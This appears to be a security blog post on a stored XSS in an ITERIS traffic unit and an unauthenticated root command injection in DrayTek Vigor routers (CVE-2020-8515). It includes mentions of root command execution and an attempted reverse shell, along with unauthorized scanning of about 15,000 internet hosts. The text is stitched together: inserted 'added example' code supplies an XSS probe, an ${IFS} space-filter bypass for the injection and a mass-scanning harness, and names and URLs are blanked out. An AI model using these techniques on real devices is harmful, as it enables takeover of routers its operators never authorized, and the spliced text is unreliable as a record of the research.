Sunday, January 26, 2020

[ITERIS] - Vantage Velocity Field Unit - Multiple Stored XSS vulnerabilities - (CVE-2020-9025)

Continuing my research on ITERIS devices, again on the "Vantage Velocity Field Unit", this time I started sending requests with a bit of JavaScript injected into one parameter or another to see what came back.

I found that in the "" function, which I only found on devices running version 2.4.2, I can inject code into several of its parameters and carry out XSS attacks. The most interesting part is that the XSS is stored, which makes it even more valuable: the payload is saved by the device and runs for whoever opens the page later, with no crafted link needed. On this function there is also a button called "Star Data Viewver", which is the one I used for the XSS. However, the request it sends includes the device admin's credentials, which I never used at any point, since the device does not ask for a password, which I found curious.

First of all, we go to the URL "http://SERVER_IP:8089/cgi-bin/".
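The check behind "inject some JavaScript and see what comes out", as an added example that is not the author's code and does not reproduce the ITERIS endpoint: an in-memory stand-in for a CGI that stores a form field and renders it later, once in the vulnerable form (stored value written straight into the page) and once hardened (escaped on output), plus a probe that stores a canary payload and classifies how it comes back in a fresh, payload-free request. The field name "location" and the page layout are assumptions.

```python
import html
import secrets

# Constructed stand-in for a device CGI that persists a submitted field and
# renders it into a later page.  Real endpoint and parameter names are not
# reproduced here; "location" (used below) is a hypothetical field name.
_stored = {}


def save_field(param, value):
    """Persist a submitted value, as a CGI with a stored-XSS bug does."""
    _stored[param] = value


def render_vulnerable(param):
    """Writes the stored value into the HTML unescaped: the stored-XSS pattern."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (param, _stored.get(param, ""))


def render_hardened(param):
    """Same page, but every stored value is HTML-escaped on output."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(param, quote=True),
        html.escape(_stored.get(param, ""), quote=True),
    )


def canary_payload():
    """Probe payload carrying a random token, so a hit cannot be confused with page text."""
    token = secrets.token_hex(4)
    return token, "<img src=x onerror=\"alert('%s')\">" % token


def classify_reflection(body, token, payload):
    """Classify how the stored payload came back in a later request."""
    if payload in body:
        return "unescaped"   # markup survived intact: exploitable
    if token in body:
        return "escaped"     # value is rendered, but the markup was neutralised
    return "absent"          # field is not rendered on this page at all


def probe_stored_xss(param, save, render):
    """Store the canary, then fetch the page again without sending the payload.

    Because the second step carries no payload, an 'unescaped' result means the
    XSS is stored, not merely reflected.
    """
    token, payload = canary_payload()
    save(param, payload)
    return classify_reflection(render(param), token, payload)


if __name__ == "__main__":
    print("vulnerable:", probe_stored_xss("location", save_field, render_vulnerable))
    print("hardened:  ", probe_stored_xss("location", save_field, render_hardened))
```

Against a real device the `save` and `render` callables would be two separate HTTP requests; keeping them separate is what distinguishes a stored finding from a reflected one.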

[DrayTek] - Unauthenticated RCE in Draytek Vigor 2960, 3900 and 300B (CVE-2020-8515)

DrayTek is a Taiwanese manufacturer of firewalls, VPN devices, routers, WLAN devices, etc. While investigating different network devices I came across a model named Vigor 2960 (no, it's not a switch like the Cisco one). The DrayTek Vigor 2960 is a high-performance dual-WAN load-balancing router and VPN gateway.

When you try to authenticate, the device sends a POST request to mainfunction.cgi with several parameters.

Now, what if we add escape characters to each of those parameters? After a few tries, it was possible to get the pwd command executed.

After executing the command, I was thinking about how to escalate privileges, but there was a surprise: after running id, I expected the answer to be "www-data" or something similar, but it was root!

Here are more examples of different commands executed.
Oops! /etc/passwd ;)

Right now I'm working on getting a reverse shell, because the commands are being parsed by mainfunction.cgi before they are executed. It's a bit tricky to get a reverse shell with a command that contains no spaces: sed is replacing the spaces with "+".
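One standard way around a space filter, as an added example that is not the author's script: let the shell put the spaces back by replacing each argument boundary with `${IFS}`, which an unquoted Bourne-style shell expands to its field separator and word-splits on. The assumption is that the injected string ends up in sh/ash/bash with the default IFS and that `$`, `{` and `}` reach the shell intact; the helper below rewrites a command and checks the result against the local `/bin/sh`.

```python
import subprocess

# Added example.  Assumption: the injected command is executed by a
# Bourne-style shell whose IFS is the default (space, tab, newline), so an
# unquoted ${IFS} expands and is word-split exactly like a literal space.


def without_spaces(cmd):
    """Rewrite a simple shell command so it contains no literal space.

    Only unquoted commands are handled.  Inside double quotes ${IFS} would
    expand to the raw separator characters rather than splitting words, so
    quoted or escaped arguments are rejected instead of silently mangled.
    """
    if any(ch in cmd for ch in ("'", '"', "\\")):
        raise ValueError("quoted or escaped arguments are not supported")
    # The braces matter: $IFSfoo would be read as the (empty) variable IFSfoo.
    return "${IFS}".join(cmd.split())


def run_sh(cmd):
    """Run a command through the local sh and return its stdout (for self-checking)."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


if __name__ == "__main__":
    original = "cat /etc/passwd | head -1"
    rewritten = without_spaces(original)
    print(rewritten)   # cat${IFS}/etc/passwd${IFS}|${IFS}head${IFS}-1
    # Pipes and redirections survive: '|' is an operator token, and the
    # leading/trailing separators that ${IFS} leaves around it are dropped by
    # field splitting.
    assert run_sh(rewritten) == run_sh(original)
```

Before relying on it against a target whose front end rewrites the input (as the sed step here does), send something harmless like `echo${IFS}marker` first and confirm the marker comes back; if the braces or the dollar sign are stripped, the trick is not available and another separator (for example a tab, or `{cmd,arg}` brace expansion in bash) has to be tried.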

But I'm concerned about something more important than that. If you go to right now and search for "Draytek" alone, you'll find 710,029 hosts!

If you search for the Vigor 2960 model, you get 15,429 hosts.

Are all of these hosts vulnerable? Let's find out.

After a few hours I had a python script that checks whether each IP in a list is vulnerable to this RCE. I exported all the results for Vigor 2960 and, a few hours later, all the hosts had been tested.


3593 are vulnerable! And I'm certain the real number is higher, because of the timeout configured in the requests: hosts that did not answer in time were counted as not vulnerable.
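The undercount comes from treating a timeout as "not vulnerable". An added example of the scanner structure that avoids that, not the author's script: the request that triggers the injection is not reproduced on this page, so the probe is passed in as a callable `probe(host, timeout) -> bool` (an assumption of this example) that returns True when the host executed the injected command and raises `socket.timeout` when it did not answer. Timeouts are recorded as their own verdict and retried with a longer limit instead of being folded into the clean count. The hosts and the `fake_probe` below are constructed for the demonstration.

```python
import socket
from concurrent.futures import ThreadPoolExecutor, as_completed

# Added example.  probe(host, timeout) -> bool is supplied by the caller; this
# file contains only the scheduling and bookkeeping around it.

VULNERABLE, NOT_VULNERABLE, TIMEOUT, ERROR = (
    "vulnerable", "not_vulnerable", "timeout", "error")


def check_host(probe, host, timeout):
    """Turn one probe into a four-way verdict; a timeout is not 'clean'."""
    try:
        return VULNERABLE if probe(host, timeout) else NOT_VULNERABLE
    except (socket.timeout, TimeoutError):
        return TIMEOUT
    except OSError:
        return ERROR


def scan(hosts, probe, timeout=5.0, retry_timeout=20.0, workers=32):
    """Scan in parallel, then retry only the timed-out hosts with a longer limit."""
    results = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = {pool.submit(check_host, probe, h, timeout): h for h in hosts}
        for fut in as_completed(futures):
            results[futures[fut]] = fut.result()
    retry = [h for h, verdict in results.items() if verdict == TIMEOUT]
    # Fewer workers on the retry pass: the slow hosts are the ones that suffer
    # most from being hammered concurrently.
    with ThreadPoolExecutor(max_workers=max(1, workers // 4)) as pool:
        futures = {pool.submit(check_host, probe, h, retry_timeout): h for h in retry}
        for fut in as_completed(futures):
            results[futures[fut]] = fut.result()
    return results


def summarize(results):
    """Count verdicts so the remaining timeouts are reported next to the hits."""
    counts = {v: 0 for v in (VULNERABLE, NOT_VULNERABLE, TIMEOUT, ERROR)}
    for verdict in results.values():
        counts[verdict] += 1
    return counts


def fake_probe(vulnerable, slow):
    """Constructed stand-in: 'slow' hosts only answer when given at least 10 s."""
    def probe(host, timeout):
        if host in slow and timeout < 10:
            raise socket.timeout("no answer within %ss" % timeout)
        return host in vulnerable
    return probe


if __name__ == "__main__":
    hosts = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]   # constructed, not real targets
    probe = fake_probe(vulnerable={"10.0.0.1", "10.0.0.3"}, slow={"10.0.0.3"})
    results = scan(hosts, probe, timeout=2, retry_timeout=15, workers=4)
    for host in sorted(results):
        print(host, results[host])
    print(summarize(results))
```

With a single short timeout the slow host would have been reported as not vulnerable; with the retry pass it is found, and whatever still times out is reported as such rather than disappearing into the clean count.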
And that's not all!

This vulnerability also works on the DrayTek Vigor 3900 and 300B.

Draytek Vigor 3900

Draytek 300B

Unlike the other two, this device is not a VPN gateway but a load balancer.

Which firmware versions have been found vulnerable so far?

  • Vigor2960
    • 1.3.1_Beta
  • Vigor3900
    • 1.4.4_Beta
  • Vigor300B
    • 1.4.4_Beta
    • 1.3.3_Beta
CVE: CVE-2020-8515

By @mpx0